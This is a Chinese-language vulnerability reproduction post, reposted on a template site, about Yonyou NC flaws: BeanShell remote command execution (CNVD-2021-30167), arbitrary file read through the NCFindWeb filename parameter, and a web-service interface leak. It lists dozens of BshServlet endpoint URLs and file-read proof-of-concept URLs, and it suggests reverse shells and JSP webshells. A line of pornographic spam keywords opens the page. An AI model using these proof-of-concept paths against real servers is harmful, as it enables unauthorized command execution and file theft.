国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

用友NC BeanShell命令執(zhí)行漏洞(CNVD-2021-30167)+任意文件讀取漏洞+接口信息泄露

這篇具有很好參考價(jià)值的文章主要介紹了用友NC BeanShell命令執(zhí)行漏洞(CNVD-2021-30167)+任意文件讀取漏洞+接口信息泄露。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

用友NC是一款企業(yè)級(jí)管理軟件,在大中型企業(yè)廣泛使用。實(shí)現(xiàn)建模、開發(fā)、繼承、運(yùn)行、管理一體化的IT解決方案信息化平臺(tái)。用友 NC bsh.servlet.BshServlet 存在遠(yuǎn)程命令執(zhí)行漏洞,通過(guò)BeanShell 執(zhí)行遠(yuǎn)程命令獲取服務(wù)器權(quán)限。

用友NC BeanShell命令執(zhí)行漏洞(CNVD-2021-30167)+任意文件讀取漏洞+接口信息泄露

命令執(zhí)行漏洞復(fù)現(xiàn)

漏洞POC

 http://x.x.x.x/service/~aim/bsh.servlet.BshServlet
 http://x.x.x.x/service/~alm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~ampub/bsh.servlet.BshServlet
 http://x.x.x.x/service/~arap/bsh.servlet.BshServlet
 http://x.x.x.x/service/~aum/bsh.servlet.BshServlet
 http://x.x.x.x/service/~cc/bsh.servlet.BshServlet
 http://x.x.x.x/service/~cdm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~cmp/bsh.servlet.BshServlet
 http://x.x.x.x/service/~ct/bsh.servlet.BshServlet
 http://x.x.x.x/service/~dm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~erm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fa/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fac/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fbm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~ff/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fip/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fipub/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fp/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fts/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fvm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~gl/bsh.servlet.BshServlet
 http://x.x.x.x/service/~hrhi/bsh.servlet.BshServlet
 http://x.x.x.x/service/~hrjf/bsh.servlet.BshServlet
 http://x.x.x.x/service/~hrpd/bsh.servlet.BshServlet
 http://x.x.x.x/service/~hrpub/bsh.servlet.BshServlet
 http://x.x.x.x/service/~hrtrn/bsh.servlet.BshServlet
 http://x.x.x.x/service/~hrwa/bsh.servlet.BshServlet
 http://x.x.x.x/service/~ia/bsh.servlet.BshServlet
 http://x.x.x.x/service/~ic/bsh.servlet.BshServlet
 http://x.x.x.x/service/~iufo/bsh.servlet.BshServlet
 http://x.x.x.x/service/~modules/bsh.servlet.BshServlet
 http://x.x.x.x/service/~mpp/bsh.servlet.BshServlet
 http://x.x.x.x/service/~obm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~pu/bsh.servlet.BshServlet
 http://x.x.x.x/service/~qc/bsh.servlet.BshServlet
 http://x.x.x.x/service/~sc/bsh.servlet.BshServlet
 http://x.x.x.x/service/~scmpub/bsh.servlet.BshServlet
 http://x.x.x.x/service/~so/bsh.servlet.BshServlet
 http://x.x.x.x/service/~so2/bsh.servlet.BshServlet
 http://x.x.x.x/service/~so3/bsh.servlet.BshServlet
 http://x.x.x.x/service/~so4/bsh.servlet.BshServlet
 http://x.x.x.x/service/~so5/bsh.servlet.BshServlet
 http://x.x.x.x/service/~so6/bsh.servlet.BshServlet
 http://x.x.x.x/service/~tam/bsh.servlet.BshServlet
 http://x.x.x.x/service/~tbb/bsh.servlet.BshServlet
 http://x.x.x.x/service/~to/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uap/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapbd/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapde/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapeai/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapother/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapqe/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapweb/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapws/bsh.servlet.BshServlet
 http://x.x.x.x/service/~vrm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~yer/bsh.servlet.BshServlet

訪問(wèn)出現(xiàn)這個(gè)頁(yè)面

用友NC BeanShell命令執(zhí)行漏洞(CNVD-2021-30167)+任意文件讀取漏洞+接口信息泄露

可能存在漏洞(還有一種情況是,存在這個(gè)界面但不能執(zhí)行命令)

用友NC BeanShell命令執(zhí)行漏洞(CNVD-2021-30167)+任意文件讀取漏洞+接口信息泄露

漏洞利用思路

1.使用反彈Shell方式進(jìn)行獲取權(quán)限。

2.關(guān)于Webshell,在權(quán)限足夠的條件下,可以嘗試寫入JSP木馬,通過(guò)蟻劍連接,拿到Shell。

任意文件讀取漏洞

filename參數(shù)可以讀取下列所有文件,在某些情況下可以讀取利用目錄穿越可讀取/etc/passwd等文件

poc:文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-504022.html

http://x.x.x.x:xxxx/NCFindWeb?service=IPreAlertConfigService&filename=/
用友NC BeanShell命令執(zhí)行漏洞(CNVD-2021-30167)+任意文件讀取漏洞+接口信息泄露

如圖所示,可以讀取到根目錄下所有文件,也可以讀取到文件內(nèi)容。

接口信息泄露

poc:

http://x.x.x.x:xxxx/uapws/service
用友NC BeanShell命令執(zhí)行漏洞(CNVD-2021-30167)+任意文件讀取漏洞+接口信息泄露

到了這里,關(guān)于用友NC BeanShell命令執(zhí)行漏洞(CNVD-2021-30167)+任意文件讀取漏洞+接口信息泄露的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 用友NC NCCLOUD BIP ldap公共入口uapjs漏洞補(bǔ)丁

    補(bǔ)丁名稱 問(wèn)題描述 發(fā)布時(shí)間 產(chǎn)品版本 領(lǐng)域 模塊 nc65_sysFunctionManager下標(biāo)越界和空指針合集補(bǔ)丁 2023-3-23 10:03 NC6.5 集團(tuán)采供 庫(kù)存管理 nc633_ldap公共入口漏洞補(bǔ)丁 nc633_ldap公共入口漏洞補(bǔ)丁 2023-3-20 16:59 NC6.33 UAP 基礎(chǔ)技術(shù)框架 nc65_ldap公共入口漏洞補(bǔ)丁 nc65_ldap公共入口漏洞補(bǔ)丁 20

    2024年02月13日
    瀏覽(16)
  • GoAhead遠(yuǎn)程命令執(zhí)行漏洞(CVE-2021-42342)

    GoAhead遠(yuǎn)程命令執(zhí)行漏洞(CVE-2021-42342)

    目錄 GoAhead遠(yuǎn)程命令執(zhí)行漏洞(CVE-2021-42342) 漏洞描述 漏洞復(fù)現(xiàn) 啟動(dòng)環(huán)境 復(fù)現(xiàn)漏洞 漏洞主要是由于上傳過(guò)濾器沒(méi)有設(shè)置不受信任的var位繞過(guò)CGI處理程序的前綴檢測(cè),滲透人員可以利用這個(gè)漏洞在未授權(quán)的情況下,構(gòu)造惡意程序數(shù)據(jù)執(zhí)行遠(yuǎn)程命令執(zhí)行攻擊,進(jìn)而獲得服務(wù)器的最

    2024年02月09日
    瀏覽(25)
  • CVE-2021-22205 GitLab 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    CVE-2021-22205 GitLab 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    目錄 一、漏洞信息 二、環(huán)境搭建 三、復(fù)現(xiàn)過(guò)程 1.測(cè)試漏洞 2.漏洞利用,反彈shell 四、修復(fù)建議 一、漏洞信息 漏洞名稱 GITLAB 遠(yuǎn)程命令執(zhí)行漏洞 漏洞編號(hào) CVE-2021-22205 危害等級(jí) 高危 CVSS評(píng)分 6.5 漏洞廠商 Ruby 受影響版本 11.9 = Gitlab CE/EE 13.8.8;13.9 = Gitlab CE/EE 13.9.6;13.10 = Gitlab

    2024年02月05日
    瀏覽(25)
  • CVE-2021-40444分析報(bào)告微軟MHTML遠(yuǎn)程命令執(zhí)行漏洞

    2021 年 8 月 21 日,MSTIC 觀察到一名 Mandiant 員工在社交媒體上發(fā)布的帖子,該員工具有跟蹤 Cobalt Strike Beacon 基礎(chǔ)設(shè)施的經(jīng)驗(yàn)。所寫文章重點(diǎn)介紹了一個(gè)于 2021 年 8 月 19 日上傳到 VirusTotal的 Microsoft Word 文檔(SHA-256:3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf)。 MSTIC 對(duì)樣

    2024年02月08日
    瀏覽(31)
  • CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    一、漏洞原理 log4j(log for java)是由Java編寫的可靠、靈活的日志框架,是Apache旗下的一個(gè)開源項(xiàng)目,使用Log4j,我們更加方便的記錄了日志信息,它不但能控制日志輸出的目的地,也能控制日志輸出的內(nèi)容格式;通過(guò)定義不同的日志級(jí)別,可以更加精確的控制日志的生成過(guò)程,

    2024年02月08日
    瀏覽(33)
  • Sangfor華東天勇戰(zhàn)隊(duì):h2數(shù)據(jù)庫(kù)console命令執(zhí)行( CVE-2021-42392 漏洞)

    Sangfor華東天勇戰(zhàn)隊(duì):h2數(shù)據(jù)庫(kù)console命令執(zhí)行( CVE-2021-42392 漏洞)

    1.1.100 = H2 Console = 2.0.204 此處復(fù)現(xiàn)版本1.4.197 啟動(dòng)項(xiàng)目如下 在Driver Class中輸入javax.naming.InitialContext 在JDBCURL中輸入jndi注入惡意鏈接 生成鏈接命令: 因?yàn)轫?xiàng)目環(huán)境是jdk1.7,因此我們用1.7的jndi,其他版本均不生效 通過(guò)漏洞公布,可以看到是在org.h2.util.JdbcUtils.getConnection的javax.na

    2024年02月11日
    瀏覽(29)
  • Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Apache Log4j是一個(gè)用于Java的日志記錄庫(kù),其支持啟動(dòng)遠(yuǎn)程日志服務(wù)器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻擊者可利用該漏洞執(zhí)行任意代碼 環(huán)境:vulhub 工具下載地址: ysoserial 利用工具生成payload: 1.創(chuàng)建文件 進(jìn)入容器內(nèi)部,查看文件創(chuàng)建成功 2.查看反彈的shell 有點(diǎn)

    2024年02月11日
    瀏覽(36)
  • 用友NC65登錄界面的jsp頁(yè)面路徑

    用友NC65登錄界面的jsp頁(yè)面路徑

    如上圖,訪問(wèn)地址 http://127.0.0.1/portal/app/mockapp/login.jsp?lrid=1對(duì)應(yīng)的頁(yè)面是哪個(gè)呢??相信很多做用友portal端開發(fā)的人可能都沒(méi)有研究或者思考過(guò)這個(gè)問(wèn)題,或者想過(guò),但是不知道路徑在哪里。你直接按地址欄的地址查,發(fā)現(xiàn)nchome里,并沒(méi)有”portal/app/mockapp/“這個(gè)路徑。 其實(shí),

    2024年02月15日
    瀏覽(19)
  • HIKVISION海康威視代碼執(zhí)行漏洞復(fù)現(xiàn)(CVE-2021-36260)

    HIKVISION??低暣a執(zhí)行漏洞復(fù)現(xiàn)(CVE-2021-36260)

    2023年將會(huì)持續(xù)于B站、CSDN等各大平臺(tái)更新,可加入粉絲群與博主交流:838681355,為了老板大G共同努力。 GET訪問(wèn)/x.asp

    2024年02月12日
    瀏覽(21)
  • 用友 NC bsh.servlet.BshServlet RCE利用

    用友 NC bsh.servlet.BshServlet RCE利用

    用友 NC bsh.servlet.BshServlet 存在遠(yuǎn)程命令執(zhí)行漏洞,該漏洞為遠(yuǎn)程命令執(zhí)行漏洞,在無(wú)需登陸系統(tǒng)的情況下,攻擊者可通過(guò)BeanShell測(cè)試接口直接執(zhí)行任意命令,惡意攻擊者成功利用該漏洞可獲得目標(biāo)系統(tǒng)管理權(quán)限,系統(tǒng)如果直接暴露在互聯(lián)網(wǎng)上風(fēng)險(xiǎn)較大。 影響版本:用友 NC6.

    2024年02月13日
    瀏覽(20)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包